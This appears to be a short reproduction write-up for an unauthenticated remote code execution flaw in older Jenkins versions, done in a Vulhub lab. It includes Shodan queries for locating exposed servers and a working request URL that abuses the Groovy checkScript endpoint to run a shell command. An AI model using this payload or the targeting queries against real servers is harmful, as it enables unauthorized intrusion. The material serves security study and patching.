Vulnerability Overview
Jenkins uses the Stapler framework, which allows users to invoke public methods via the URL PATH. Since there are no restrictions in place for this process, attackers can craft specific PATHs to execute sensitive Java methods.
This vulnerability enables the discovery of numerous exploit chains. The most severe impact is bypassing the Groovy sandbox, allowing unauthorized users to execute arbitrary commands. Before executing Groovy scripts in the sandbox, Jenkins checks the script for errors. This checking process is not sandboxed, enabling attackers to use meta-programming techniques to execute arbitrary commands during this step.
Affected Versions
- Jenkins <= 2.153
- Jenkins LTS <= 2.138.3
Shodan Search Syntax
http.favicon.hash:81586312
Since Shodan does not support wildcards, specific version numbers can be filtered using the keyword X-Jenkins:.
http.favicon.hash:81586312 "X-Jenkins: 2.13"
Exploit
https://github.com/orangetw/awesome-jenkins-rce-2019
Environment Setup
Use Vulhub for reproduction. Start a Jenkins 2.138 instance, with the vulnerable plugins already installed.
Vulnerability Reproduction
http://your-ip:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript
?sandbox=true
&value=public class x {
public x(){
"touch /tmp/success".execute()
}
}
Command executed successfully.
Root Cause Analysis
Jenkins does not have web request logs, making it impossible to trace.
Remediation
Upgrade to the latest version.